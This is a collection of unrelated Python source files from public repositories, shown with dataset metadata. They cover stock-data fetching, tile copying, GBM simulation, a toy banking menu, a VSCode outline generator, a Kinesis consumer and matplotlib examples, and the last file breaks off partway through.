return\r\n\r\n st.subheader(\"Results\")\r\n st.write(f\"It took {time_spent}s to process your video\")\r\n\r\n st.download_button(\r\n label=\"Here's your translated video\",\r\n data=get_video_download(translated_video),\r\n file_name=translated_video,\r\n # the produced 
audio is an mp4 file. this should be changed if the\r\n            # video mimetype changes\r\n            mime=\"video/mp4\",\r\n            key=\"video_download_btn\"\r\n        )\r\n","repo_name":"NITHUB-AI/TheInterpreter","sub_path":"web/translate_video.py","file_name":"translate_video.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
{"seq_id":"70843897150","text":"from ts_mysql import *\nfrom ts_mysql import data_preparation as dp # data preprocessing\nimport pandas as pd\n# data downloaded from tushare is in pandas.DataFrame format\n\npro = ts.pro_api()\n\n# this module is used to fetch data from tushare\n\ndef initial_token(token):\n    \"\"\"set your token\"\"\"\n    ts.set_token(token)\n\n# NOTE: the original code called initial_token() here without the required token\n# argument, which raises a TypeError; supply your own tushare token instead, e.g.\n# initial_token('<your-token>')\n#%% get data from tushare\ndef get_symbolIntushare():\n    \"\"\"Get the basic stock list and related info from tushare\"\"\"\n    code = pro.stock_basic()\n    return dp.none2str_0(code)\n\ndef get_index_of_certain_market(market=''):\n    \"\"\"\n    obtain the Index of a certain market\n    market code \tdescription\n    MSCI \tMSCI indices\n    CSI \tCSI (China Securities Index) indices\n    SSE \tShanghai Stock Exchange indices\n    SZSE \tShenzhen Stock Exchange indices\n    CICC \tCICC (CFFEX) indices\n    SW \tShenwan indices\n    CNI \tCNI (Guozheng) indices\n    OTH \tother indices\n    \"\"\"\n    df = pro.index_basic(market = market)\n    return dp.none2str_0(df)\n\ndef get_index_allInTushare():\n    market_list = ['MSCI','CSI','SSE','SZSE','CICC']\n    df = get_index_of_certain_market('OTH')\n    for mk in market_list:\n        data_temp = get_index_of_certain_market(mk)\n        df = pd.concat([df, data_temp], axis=0, join='outer')\n#    try:\n#        del df['list_date']\n#    except Exception as ee:\n#        print(ee)\n    return dp.none2str_0(df)\n\ndef get_1stock_daily_data(ts_code='',start_date='19900101',end_date=now_):\n    \"\"\"\n    :param ts_code:str\n    :param trade_date\\end_date:str yyyymmdd\n    \"\"\"\n#    if not end_date:\n#        end_date = time.strftime('%Y%m%d')\n#    if not start_date:\n#        start_date='19990101'\n    df = pro.daily(ts_code=ts_code,start_date=start_date,end_date=end_date)\n    d = df.drop(['change'],axis=1)#change is a mysql keyword, can't be used\n    return d\n\ndef get_1index_daily(ts_code='',start_date='19900101',end_date=now_):\n    \"\"\"\n    \"\"\"\n    df = pro.index_daily(ts_code=ts_code,start_date=start_date,end_date=end_date)\n    d = df.drop(['change'],axis=1)#change is a mysql keyword, can't be used\n    \n    return dp.none2str_0(d)\n\n\ndef get_1stock_daily_dataInTushare(ts_code='',start_date='19900101',end_date=now_):\n    \"\"\"\n    :param ts_code:str\n    :param trade_date\\end_date:str yyyymmdd\n    \"\"\"\n#    if not end_date:\n#        end_date = time.strftime('%Y%m%d')\n#    if not start_date:\n#        start_date='19990101'\n    df = pro.daily(ts_code=ts_code,start_date=start_date,end_date=end_date)\n    d = df.drop(['change'],axis=1)\n    return d\n\nif __name__ == '__main__':\n    print(\"tushare_api module\".center(20,'-'))\n    #initial_token() # initial token to get access\n\n    #get daily data of '000001.SZ' from '20180101' to '20181126'\n    # df = get_1stock_daily_data(ts_code='000001.SZ',start_date='20180101',end_date='20181126')\n    # print(df)\n\n    #get all indexes in tushare\n    #df = get_index_allInTushare()\n    \n    #get_1 index daily data\n    df = get_1index_daily(ts_code='399300.SZ')\n    print(df)\n\n","repo_name":"bladezzw/backtesting_module","sub_path":"ts_mysql/tushare_api.py","file_name":"tushare_api.py","file_ext":"py","file_size_in_byte":2850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
{"seq_id":"6031325795","text":"import sys\nimport shutil\nimport os, glob\nimport subprocess\nimport math\nimport time\nfrom datetime import datetime\nfrom gooey import Gooey, GooeyParser\nfrom geojson import Point, Feature, FeatureCollection, Polygon,dump\nfrom multiprocessing 
import Pool,freeze_support\nsys.path.append('{0}/lib/atlass/'.format(sys.path[0]).replace('\\\\','/'))\nfrom Atlass_beta1 import *\n\n@Gooey(program_name=\"Tile migrater\", use_legacy_titles=True, required_cols=1, default_size=(1000,820))\ndef param_parser():\n parser=GooeyParser(description=\"Moves/Copies specified tiles to a new folder\")\n parser.add_argument(\"input_folder\", metavar=\"Input Directory \", widget=\"DirChooser\", help=\"Select folder with input files\")\n parser.add_argument(\"output_dir\", metavar=\"Output Directory\", widget=\"DirChooser\", help=\"Output directory\")\n parser.add_argument(\"-file\",metavar=\"Tilelayout File\", widget=\"FileChooser\")\n parser.add_argument(\"filetype\",metavar=\"Input File Type\", help=\"Select input file type\", choices=['las', 'laz','zip','rar','txt','asc','shp','shx','dbf','prj','tab','dat','id','map'], default='laz')\n parser.add_argument(\"-co\", \"--cores\",metavar=\"Cores\", help=\"No of cores to run in\", type=int, default=4)\n parser.add_argument(\"-copy\", metavar=\"Copy Files to output folder\", action='store_true', default=False)\n parser.add_argument(\"-move\", metavar=\"Move Files to output folder\", action='store_true', default=False)\n txtf_group = parser.add_argument_group(\"Use Text file\", gooey_options={'show_border': True,'columns': 3})\n txtf_group.add_argument(\"-usetxtfile\", action=\"store_true\", help=\"Use Txt file as input\")\n txtf_group.add_argument(\"-txtfile\",metavar=\"Input Text file\", widget=\"FileChooser\")\n txtf_group.add_argument(\"-tilesize\",metavar=\"Input file tile size\", default=500, type = int)\n batch_group = parser.add_argument_group(\"create batches\", gooey_options={'show_border': True,'columns': 3})\n batch_group.add_argument(\"-ba\", \"--batches\",metavar=\"Batches\", help=\"No of batches to split to\", type=int, default=1,gooey_options={\n 'validator': {\n 'test': '1 <= int(user_input) <= 250',\n 'message': 'Must be between 1 and 250'\n }})\n block_group = parser.add_argument_group(\"Blocking Settings\", \"Required when breaking a tilelayout into desired block sizes. 
\\n**Do not use with the 'Batches' setting above\", gooey_options={'show_border': True,'columns': 2})\n block_group.add_argument(\"-gen_block\",metavar=\"Generate Blocks\", help=\"Divide to blocks\",action='store_true', default=False)\n block_group.add_argument(\"-block_size\",metavar=\"Block size\", help=\"Block size\", type = int ,default=10000)\n\n return parser.parse_args()\n\ndef copyfile(input, output):\n log = ''\n try:\n shutil.copyfile(input, output)\n\n except subprocess.CalledProcessError as suberror:\n log=log +'\\n'+ \"{0}\\n\".format(suberror.stdout)\n return (False,None,log)\n\n finally:\n if os.path.isfile(output):\n #print('File {0} moved to {1}'.format(input,output))\n log = \"Copying file for {0} Success\".format(input)\n return (True,output, log)\n\n else: \n log = \"Copying file for {0} Failed\".format(input)\n return (False,output, log)\n\ndef movefiles(input, output):\n log = ''\n try:\n shutil.move(input, output)\n\n except subprocess.CalledProcessError as suberror:\n log=log +'\\n'+ \"{0}\\n\".format(suberror.stdout)\n return (False,None,log)\n\n finally:\n if os.path.isfile(output):\n #print('File {0} moved to {1}'.format(input,output))\n log = \"Moving file {0} Success\".format(input)\n return (True,output, log)\n\n else: \n log = \"Moving file {0} Failed\".format(input)\n return (False,output, log)\n\n\ndef main():\n\n freeze_support()\n\n args = param_parser()\n\n intputfolder = args.input_folder.replace('\\\\','/')\n outputfolder = AtlassGen.makedir(args.output_dir.replace('\\\\','/'))\n tilelayoutfile = args.file\n filetype = args.filetype\n cores = args.cores\n copy = args.copy\n move = args.move\n batches = args.batches\n gen_block = args.gen_block\n block_size = int(args.block_size)\n ffile = args.txtfile\n usetxtfile = args.usetxtfile\n tilesize = args.tilesize\n tasks = {}\n \n\n\n tl_in = AtlassTileLayout()\n\n\n\n if usetxtfile:\n lines = [line.rstrip('\\n')for line in open(ffile)]\n \n \n modificationTime = time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time()))\n for i,line in enumerate(lines):\n print(line)\n tilename = line\n\n x,y = tilename.split('_')\n\n tl_in.addtile(name=tilename, xmin=float(x), ymin=float(y), xmax=float(x)+tilesize, ymax=float(y)+tilesize, modtime=modificationTime)\n else:\n\n\n tl_in.fromjson(tilelayoutfile)\n \n no_of_tiles = len(tl_in)\n \n print('\\nTotal Number of Files : {0}'.format(no_of_tiles))\n batchlen=math.ceil(no_of_tiles/batches)\n batch=0\n \n if gen_block:\n features = []\n blocks = []\n\n\n print('\\nBlocking started.')\n block_path = os.path.join(outputfolder,'{0}m_blocks'.format(block_size)).replace('\\\\','/')\n\n\n for tile in tl_in:\n tilename = tile.name\n xmin = tile.xmin\n xmax = tile.xmax\n ymin = tile.ymin\n ymax = tile.ymax\n tilesize = int(int(xmax) - int(xmin))\n\n block_x = math.floor(xmin/block_size)*block_size\n block_y = math.floor(ymin/block_size)*block_size\n blockname = '{0}_{1}'.format(block_x,block_y)\n block_folder = os.path.join(block_path,blockname).replace('\\\\','/')\n\n if blockname not in blocks:\n blocks.append(blockname)\n\n boxcoords=AtlassGen.GETCOORDS([xmin,ymin],tilesize)\n poly = Polygon([[boxcoords[0],boxcoords[1],boxcoords[2],boxcoords[3],boxcoords[4]]])\n\n\n \n if not os.path.exists(block_folder):\n AtlassGen.makedir(block_folder)\n\n input = os.path.join(intputfolder,'{0}.{1}'.format(tilename, filetype)).replace('\\\\','/')\n output = os.path.join(block_folder,'{0}.{1}'.format(tilename, filetype)).replace('\\\\','/')\n #print(output)\n #block_task[blockname] = 
AtlassTask(blockname, movefiles, input, output)\n if copy:\n tasks[tilename] = AtlassTask(tilename, copyfile, input, output)\n elif move:\n tasks[tilename] = AtlassTask(tilename, movefiles, input, output)\n else:\n print(\"no command selected\")\n p=Pool(processes=cores) \n results=p.map(AtlassTaskRunner.taskmanager,tasks.values())\n\n success = 0\n for result in results:\n if not result.success:\n print('File {0} could Not be copied/moved'.format(result.name ))\n else:\n success +=1\n print('No of blocks : {0}'.format(len(blocks)))\n print('\\nFiles copied/moved Successfully : {0}'.format(success))\n\n\n for block in blocks:\n blockname = block\n block_folder = os.path.join(block_path,blockname).replace('\\\\','/')\n lfiles = AtlassGen.FILELIST(['*.{0}'.format(filetype)],block_folder)\n tilelayout = AtlassTileLayout()\n features = []\n for lf in lfiles:\n path, tilename, ext = AtlassGen.FILESPEC(lf)\n xmin,ymin = tilename.split('_')\n xmax = str(int(xmin)+tilesize)\n ymax = str(int(ymin)+tilesize)\n\n boxcoords=AtlassGen.GETCOORDS([xmin,ymin],tilesize)\n poly = Polygon([[boxcoords[0],boxcoords[1],boxcoords[2],boxcoords[3],boxcoords[4]]])\n\n #adding records for json file\n features.append(Feature(geometry=poly, properties={\"name\": tilename, \"xmin\": xmin, \"ymin\":ymin, \"xmax\":xmax, \"ymax\":ymax, \"tilenum\":tilename}))\n tilelayout.addtile(name=tilename, xmin=float(xmin), ymin=float(ymin), xmax=float(xmax), ymax=float(ymax))\n \n jsonfile = 'TileLayout'\n jsonfile = os.path.join(block_folder,'{0}_{1}.json'.format(jsonfile,len(features)))\n\n\n\n feature_collection = FeatureCollection(features)\n\n with open(jsonfile, 'w') as f:\n dump(feature_collection, f)\n\n\n\n\n\n\n\n\n else:\n for i, tile in enumerate(tl_in): \n \n tilename = '{0}.{1}'.format(tile.name,filetype)\n\n if i%batchlen==0:\n batch=batch+1\n batchstring='{0}'.format(batch)\n batchstring=batchstring.rjust(3, '0')\n if batches==1:\n output = os.path.join(outputfolder, tilename).replace(\"\\\\\", \"/\")\n else:\n output = os.path.join(AtlassGen.makedir('{0}/Batch_{1}'.format(outputfolder,batchstring)), tilename).replace(\"\\\\\", \"/\")\n\n input = os.path.join(intputfolder, tilename).replace(\"\\\\\", \"/\")\n \n if copy:\n tasks[tilename] = AtlassTask(tilename, copyfile, input, output)\n elif move:\n tasks[tilename] = AtlassTask(tilename, movefiles, input, output)\n else:\n print(\"no command selected\")\n\n\n p=Pool(processes=cores) \n results=p.map(AtlassTaskRunner.taskmanager,tasks.values())\n\n success = 0\n for result in results:\n if not result.success:\n print('File {0} could Not be copied/moved'.format(result.name ))\n else:\n success +=1\n \n print('Files copied/moved Successfully : {0}'.format(success))\n\nif __name__ == \"__main__\":\n main() \n","repo_name":"maneshadslv/AtlassTools","sub_path":"CreateArea.py","file_name":"CreateArea.py","file_ext":"py","file_size_in_byte":9822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"37167989716","text":"from abc import abstractmethod\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nclass MonteCarloSimulator:\n\n def __init__(self, T: float, n_steps: float, n_sims: float, seed: int, scheme: str = None):\n\n self.n_steps = n_steps\n self.n_sims = n_sims\n self.seed = seed\n self.scheme = scheme\n self.T = T\n self.dt = self.T / (self.n_steps - 1)\n\n\nclass GeometricBrownianMotionSimulator(MonteCarloSimulator):\n\n\n def __init__(self, S0: float, sigma: float, rf: float, 
*args, **kwargs):\n        super().__init__(*args, **kwargs)\n        self.S0 = S0\n        self.sigma = sigma\n        self.rf = rf\n        self.get_theoretical_moments()\n\n\n# these are static methods since numba/cuda will not work otherwise\n    # for future development\n\n    def get_theoretical_moments(self):\n        self.theoretical_mean = self.S0 * np.exp(self.rf * self.T)\n        self.theoretical_variance = self.S0 ** 2 * np.exp(2 * self.rf * self.T) * (np.exp(self.sigma ** 2 * self.T) - 1)\n\n        # ES3 = self.S0 ** 3 * np.exp(3 * self.rf + 3 * self.sigma)\n        # self.theoretical_skewness = (ES3 - 3 * self.rf * self.sigma ** 2 + 2 * self.rf ** 3) / self.sigma ** 3\n\n    @staticmethod\n    def _closed_form(S_prev, rf, dt, sigma, normal):\n        pass\n\n    @staticmethod\n    def _euler_maruyama_scheme(S_prev, rf, dt, sigma, normal):\n        return S_prev * (1 + rf * dt + sigma * normal * np.sqrt(dt))\n\n    @staticmethod\n    def _milstein_scheme(S_prev, rf, dt, sigma, normal):\n        dW = normal * np.sqrt(dt)\n        return S_prev * (1 + rf * dt + sigma * dW + 0.5 * sigma**2 * (dW ** 2 - dt))\n\n    @staticmethod\n    def _runge_kutta(S_prev, rf, dt, sigma, normal):\n        dW = normal * np.sqrt(dt)\n        S_hat = S_prev * (1 + rf * dt + sigma * np.sqrt(dt))\n        euler_term = S_prev * (1 + rf * dt + sigma * normal * np.sqrt(dt))\n        adjustment = 0.5 * (sigma * (S_hat - S_prev)) * (dW ** 2 - dt) / np.sqrt(dt)\n        return euler_term + adjustment\n\n    @staticmethod\n    def _closed_form_soln(S_prev, rf, dt, sigma, normal):\n        W = normal * np.sqrt(dt)\n        return S_prev * np.exp((rf - sigma ** 2 / 2) * dt + sigma * W)\n\n    @staticmethod\n    def _simulate(S0, rf, dt, sigma, normal, n_sims, n_steps, func: object):\n\n        S = np.zeros((n_sims, n_steps))\n        S[:,0] = S0\n\n        for i in range(n_steps-1):\n            S[:,i+1] = func(S[:,i], rf, dt, sigma, normal[:,i])\n\n        return S\n\n\n    def simulate(self):\n        np.random.seed(self.seed)\n        normal = np.random.normal(0, 1, size=(self.n_sims, self.n_steps))\n\n        if self.scheme == 'Euler-Maruyama':\n            func = self._euler_maruyama_scheme\n        elif self.scheme == 'Milstein':\n            func = self._milstein_scheme\n        elif self.scheme == 'Runge-Kutta':\n            func = self._runge_kutta\n        else:\n            func = self._closed_form_soln\n\n        self.S = self._simulate(self.S0, self.rf, self.dt, self.sigma, normal, self.n_sims, self.n_steps, func)\n\n\n    def plot_paths(self):\n        if self.scheme is not None:\n            plt.title(f\"Simulated GBM paths using {self.scheme} discr. scheme\")\n        if self.scheme is not None:\n            for j in range(self.n_sims):\n                plt.plot(self.S[j,:])\n        plt.grid(True)\n\n    def plot_dist(self):\n        plt.title(f\"Distribution using {self.scheme} discr. scheme\")\n        sns.histplot(self.S[:,-1])\n        plt.show()\n\n\n\n\n\n\n\n\n","repo_name":"DeblueJenkins/the_blue_analytics","sub_path":"simulator.py","file_name":"simulator.py","file_ext":"py","file_size_in_byte":3482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
{"seq_id":"40037754503","text":"## Banking System Project in Python\n\nmenu = \"\"\"\n\n[d] deposit\n[s] withdraw\n[e] statement\n[q] quit\n\n=> \"\"\"\n\nsaldo = 0\nlimite = 500 \nextrato = \"\"\nsaques_realizados = 0\nLIMITE_SAQUES = 4\n\nwhile True:\n    option = input(menu)\n\n    if option == \"d\":\n        valor = float(input(\"Enter the deposit amount: \"))\n\n        if valor > 0:\n            saldo += valor\n            extrato += f\"Deposit: R$ {valor:.2f}\\n\"\n        \n        else:\n            print(\"Operation failed. 
Invalid amount.\")\n\n    elif option == \"s\":\n        valor = float(input(\"Enter the withdrawal amount: \"))\n\n        excedeu_saldo = valor > saldo\n\n        excedeu_limite = valor > limite\n\n        excedeu_saques = saques_realizados >= LIMITE_SAQUES\n\n        if excedeu_saldo: \n            print (\"Failed! Insufficient balance\")\n        elif excedeu_limite:\n            print (\"Failed! Withdrawal amount limit exceeded\")\n        elif excedeu_saques:\n            print (\"Failed! Withdrawal count limit exceeded, only 4 allowed\")\n        \n        \n        elif valor > 0:\n            saldo -= valor\n            extrato += f\"Withdrawal: R$ {valor:.2f}\\n\"\n            saques_realizados += 1\n        \n\n        else:\n            print(\"Failed! The amount entered is invalid!\")\n        \n    elif option == \"e\":\n        print (\"\\n=========== STATEMENT ===========\")\n        print (\"No transactions were made.\" if not extrato else extrato)\n        print (f\"\\nBalance: R$ {saldo:.2f}\")\n        print (\"===============================\")\n    elif option == \"q\":\n        break\n    \n    else:\n        print (\"Invalid option! Please select a valid operation\")","repo_name":"gustavosampaio95/sistema-bancario-python","sub_path":"Projeto de Sistema Bancário em Python.py","file_name":"Projeto de Sistema Bancário em Python.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
{"seq_id":"42220713622","text":"from os.path import join, dirname, basename, exists\nfrom textx.metamodel import metamodel_from_file\nfrom textx.export import metamodel_export, model_export\nfrom shutil import copyfile\nfrom jinja2 import Template\n\nclass OutlineVSCode(object):\n\n    def __init__(self, configuration):\n        self.configuration = configuration\n        self.outline_path = join(self.configuration.project_path, 'out', 'src', 'outline')\n        self.this_folder = dirname(__file__)\n\n    def do_outline_for_vscode(self):\n        if self.configuration.outline_path == '':\n            return\n        self.generate_python_interpreter_path()\n        self.copy_script()\n        self.copy_outline_tx()\n        self.copy_outline_program()\n        self.copy_language_grammar()\n        self.generate_codeOutline_js()\n        #self.copy_code_outline()\n        model = self.get_outline_model()\n        self.copy_icons(model)\n\n    def get_outline_model(self):\n        this_folder = dirname(__file__)\n        language = metamodel_from_file(join(dirname(__file__), 'resources', 'outline.tx'))\n        metamodel_export(language, join(dirname(__file__), 'outline.dot'))\n        grammar_model = language.model_from_file(self.configuration.outline_path)\n        model_export(grammar_model, join(this_folder, 'outline.dot'))\n        return grammar_model\n\n    def generate_python_interpreter_path(self):\n        with open(join(self.outline_path, 'python_interpreter.txt'), 'w') as file:\n            file.write(self.configuration.python_interpreter)\n\n    def copy_script(self):\n        copyfile(join(self.this_folder, 'resources', 'script.py'),join(self.outline_path, 'script.py'))\n\n    def copy_outline_tx(self):\n        copyfile(join(self.this_folder, 'resources', 'outline.tx'),\n                 join(self.outline_path, 'outline.tx'))\n\n    def copy_outline_program(self):\n        copyfile(join(self.configuration.outline_path), join(self.outline_path, 'outline.ol'))\n\n    def copy_language_grammar(self):\n        with open(self.configuration.grammar_path, 'r') as grammar_file, \\\n                open(join(self.outline_path, 'language.tx'), 'w') as language_file:\n            language_file.write(grammar_file.read())\n\n    def generate_codeOutline_js(self):\n        this_folder = dirname(__file__)\n        with open(join(this_folder, 'templates', 'codeOutline.js.template'), 'r') as file:\n            data = file.read()\n        template = Template(data)\n        extension = self.get_data()\n        result = 
template.render(extension)\n result_file = open(join(self.configuration.project_path, 'out', 'src', 'outline', 'codeOutline.js'), 'w')\n result_file.write(result)\n\n def get_data(self):\n extension = {\n 'name': self.configuration.language_name\n }\n return extension\n\n #def copy_code_outline(self):\n # copyfile(join(self.this_folder, 'resources', 'codeOutline.js.template'),\n #\n # join(self.configuration.project_path, 'out', 'src', 'outline', 'codeOutline.js.template'))\n\n def copy_icons(self, model):\n for rule in model.rules:\n if rule.icon != None and exists(rule.icon.path):\n name = basename(rule.icon.path)\n copyfile(rule.icon.path, join(self.configuration.project_path, 'resources', 'icons', name))\n","repo_name":"starcev/textX-extensions","sub_path":"outline/outline.py","file_name":"outline.py","file_ext":"py","file_size_in_byte":3293,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"6584648102","text":"from boto.kinesis.exceptions import ProvisionedThroughputExceededException\nimport datetime\nimport boto3\nimport time\n\nkinesis=boto3.client('kinesis')\n\nclass KinesisConsumer:\n \"\"\"Generic Consumer for Amazon Kinesis Streams\"\"\"\n def __init__(self, stream_name, shard_id, iterator_type,\n worker_time=30, sleep_interval=0.5):\n\n self.stream_name = stream_name\n self.shard_id = str(shard_id)\n self.iterator_type = iterator_type\n self.worker_time = worker_time\n self.sleep_interval = sleep_interval\n\n def process_records(self, records):\n \"\"\"the main logic of the Consumer that needs to be implemented\"\"\"\n for part_key, data in self.iter_records(records):\n print(part_key, \":\", data)\n raise NotImplementedError\n\n @staticmethod\n def iter_records(records):\n for record in records:\n part_key = record['PartitionKey']\n data = record['Data']\n yield part_key, data\n\n def run(self):\n \"\"\"poll stream for new records and pass them to process_records method\"\"\"\n print(\"-----RUN-----\")\n response = kinesis.get_shard_iterator(StreamName=self.stream_name,\n ShardId=self.shard_id, ShardIteratorType=self.iterator_type)\n \n # print(\"====RESPONSE=====\")\n # print(response)\n # print(\"\\n\\n\\n\")\n \n next_iterator = response['ShardIterator']\n\n # print(\"====NEXT_IT=====\")\n # print(next_iterator)\n # print(\"\\n\\n\\n\")\n \n start = datetime.datetime.now()\n finish = start + datetime.timedelta(seconds=self.worker_time)\n\n while finish > datetime.datetime.now():\n try:\n response = kinesis.get_records(ShardIterator=next_iterator, Limit=25)\n\n records = response['Records']\n \n # print(\"====RECORDS=====\")\n # print(records)\n # print(\"\\n\\n\\n\")\n\n if records:\n self.process_records(records)\n\n next_iterator = response['NextShardIterator']\n time.sleep(self.sleep_interval)\n except ProvisionedThroughputExceededException as ptee:\n time.sleep(1)\n \n \n \nclass EchoConsumer(KinesisConsumer):\n \"\"\"Consumers that echos received data to standard output\"\"\"\n def process_records(self, records):\n \"\"\"print the partion key and data of each incoming record\"\"\"\n for part_key, data in self.iter_records(records):\n print(part_key, \":\", data)\n \n \nshard_id = 'shardId-000000000004'\niterator_type = 'LATEST'\nworker = EchoConsumer(\"testowy\", shard_id, iterator_type, 
worker_time=20)\n\nworker.run()","repo_name":"jwszol-classes/isp-2020-ZekJakGynDam","sub_path":"old/Kinesis_przyklad/get.py","file_name":"get.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"}
{"seq_id":"10085137040","text":"# -*- coding: utf-8 -*-\n\"\"\"\nPlot example\n\nUse some modules and their functions to make a beautiful plot for your own purpose.\n\nYou can read the full code by typing \"plot_test??\" on the IPython\nconsole or ctrl+left_click on the spyder text editor after importing this code.\n\nIf you want to plot a graph on a new window interactively, change the backend of\nyour console\nex) on the ipython console type \"%matplotlib\", where % can be omitted\n\n\nCreated on Wed Jul 20 14:49:42 2016\n\n@author : Kang, J\n-----------------------------------------------\nShows an example of how to use matplotlib.\n\n\"\"\"\n\n__author__= \"Kang,J : jhkang@astro.snu.ac.kr\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\n#Variable\nx=np.linspace(0,100,11)\ny=2*x.copy()\n\n#figure size -----------------------------------------------\nfig=plt.figure(1,figsize=(16,10))\n#ax=fig.add_subplot(111)\n\n#font setup-------------------------------------------------\n#usually Helvetica is the default font\n#hfont=['fontname':'Helvetica']\n#plt.rcParams['font.family']='Helvetica'\n#plt.subplot(111)\n\n#plot -----------------------------------------------------------\n#ax=plt.subplot(111)\nplt.plot(x,x,color='black',linestyle='solid',marker='o',markerfacecolor='red',\n         markersize=7,markeredgecolor='blue',linewidth=2)\nplt.plot(x,y,color='blue',linestyle='dashed',marker='+',\n         markerfacecolor='green',markersize=10,markeredgecolor='green',\n         linewidth=2,markeredgewidth=2)\n\n#create the text on the graph\nplt.annotate('SDO/AIA 171',xy=(25,25),color='blue',fontsize=20,\n             fontweight='bold') \nplt.text(15,15,'plt.text',fontsize=20,fontweight='bold')\n\n#plot symbol on the graph\nplt.plot([75],[75],'o',markerfacecolor='green',markersize=10,\n         markeredgecolor='black')\n\n#arrow mark and text\nplt.annotate(\"I'M OUTSIDER\",xy=(75,75),xytext=(80,60),color='black',\n             fontsize=20,arrowprops=dict(facecolor='red',shrink=0.05),\n             fontweight='bold')\n \n#legend\nplt.legend(('line1','line2'),loc=1,fontsize=20,handlelength=3)\n\n\n#Axes & Tick setup----------------------------------------------------\nplt.rc('axes',linewidth=2.5)\nplt.ylim([0,100])\n\nplt.tick_params(width=2.5,length=10,direction='out',axis='y')\nplt.tick_params(width=2.5,length=10,direction='in',axis='x')\n\n#If you want to set minor ticks,\n#ax.minorticks_on()\n#ax.tick_params(width=1,length=5,which='minor')\n\n#if you want to set ticks on each axis,\nplt.xticks(np.linspace(0,100,5),fontsize=20,fontweight='bold')\nplt.yticks(np.linspace(0,100,6,endpoint=True),fontsize=20,fontweight='bold')\n\n#if you want to set ticks as strings\n#plt.xticks(np.linspace(0,100,5),['name',r'$\\alpha$',r'$0$','d','f'])\n#axis range\n\n#Title--------------------------------------------------------\n\nplt.xlabel(r'IMX-axis $\\mathbf{\\gamma}$',fontsize=20,fontweight='bold')\nplt.ylabel(r'IMx-axis $\\mathbf{\\alpha}$',fontsize=20,fontweight='bold')\nplt.title(r'SDO/AIA 171 $\\mathbf{\\AA}$',fontsize=20,fontweight='bold')\n\n\n#invert axes-------------------------------------------------\n#ax.invert_xaxis()\n\n#show the image---------------------------------------------\nplt.show()\n\n
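# (editor's addition, brief note) imshow() below maps array indices to pixels; with\n# origin='lower' row 0 of the array is drawn at the bottom of the axes, which relates\n# to the matplotlib-vs-IDL orientation caution at the end of this script.\n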
#2d image--------------------------------------------------\na=np.arange(25)\nb=a.reshape((5,5))-12\nfig=plt.figure(2,figsize=(16,10))\nim=plt.imshow(b,cmap=plt.cm.Greys_r,origin='lower')\nplt.clim(-10,10) # color bar limit\nplt.xticks([0,2,4],fontsize=20)\nplt.colorbar(im,ticks=[-10,0,10])\nplt.show()\n#Be careful: python plots a 2d array from the top left to the bottom right,\n#but IDL plots a 2d array from the bottom left to the top right","repo_name":"SNU-sunday/Python-Learning","sub_path":"example_script/plot_test.py","file_name":"plot_test.py","file_ext":"py","file_size_in_byte":3567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
{"seq_id":"19275333667","text":"# author azure\n#lst = [\"赵四\",\"施瓦辛格\",\"海波\",\"郭大侠\",\"赛利亚\"]\n# append at the end\n#lst.append(\"黄宏\") # operates on the original list in place\n# insert at the front\n#lst.insert(1,\"王力宏\") #insert at index 1\n\n# lst.extend(\"马化腾\") # iterable add: adds one character at a time\n# lst.extend([\"马云\",\"王健林\"]) #adds whole elements\n# print(lst)\n\n# delete\n# data = lst.pop(2) #returns the removed element\n# print(data)\n# print(lst)\n# lst.remove(\"赵四\") #removes the element\n# lst.remove(\"刘能\") #raises \"x not in list\" if the element does not exist\n\n#delete by slicing\n#del lst[1:3]\n\n#clear the list\n# lst.clear()\n# print(lst)\n\n# lst = [\"王者荣耀\",\"魔兽世界\",\"DNF\",\"你受寒\",\"cs\"]\n# # lst[0] = \"扫雷\" #replace \"王者荣耀\" with \"扫雷\".\n# # lst[1:3] = [\"跑跑卡丁车\"] # deletes first, then appends\n# lst[1::2] = [\"qq华夏\",\"QQ三国\"] #when slicing with a step other than 1, mind the number of elements\n# print(lst)\n\nlst = [\"锅包肉\",\"火锅\",\"烤鱼\",\"白菜\",\"烤鸭\"]\n\nfor el in lst: #element\n    print(el)","repo_name":"azure-sea/python","sub_path":"第004章 列表_元组/列表的增删改查.py","file_name":"列表的增删改查.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"}
{"seq_id":"35773891997","text":"from typing import List, Union\n\nimport copy\nimport dataclasses\nimport numbers\n\nimport numpy as np\n\n\nclass FlowMeta(type):\n    \"\"\"Creates a new `Flow` object.\n\n    This metaclass is responsible for the following:\n    (1) Turning `Flow` classes into dataclasses. This is merely for usability.\n    (2) Automatically generating `ConstFlags` if it does not already exist.\n    (3) Automatically generating `Grad` if it does not already exist.\n\n    A `Flow` class must have the following two counterparts:\n    (1) `ConstFlags` is a dataclass with flags for every non-constant flow field\n        that is used by `NodeFlags` to indicate whether the flags are constant\n        or frozen. These are used to optimize function and gradient evaluation.\n    (2) `Grad` is a gradient flow object corresponding to the flow class.\n\n    A valid `ConstFlags` must resemble the following:\n\n    ```python\n\n    class ConstFlags:\n\n        def __bool__(self) -> bool:\n            # Indicates whether the flow is entirely constant.\n\n        def set_all(self, value: bool) -> None:\n            # Sets all the fields to have constantness given by `value`.\n    ```\n    The default implementation simply makes a field for `ConstFlags` for every\n    non-constant field in the flow.\n\n    A valid `Grad` must resemble the following:\n\n    ```python\n\n    # Must inherit from `Flow.Grad`.\n    class Grad(flows.Flow.Grad):\n\n        def __iadd__(self, value: Grad) -> Grad:\n            # Implements how to sum a version of itself.\n            # This is used by backprop.\n    ```\n    The default implementation makes a field called \"XXX_grad\" for every\n    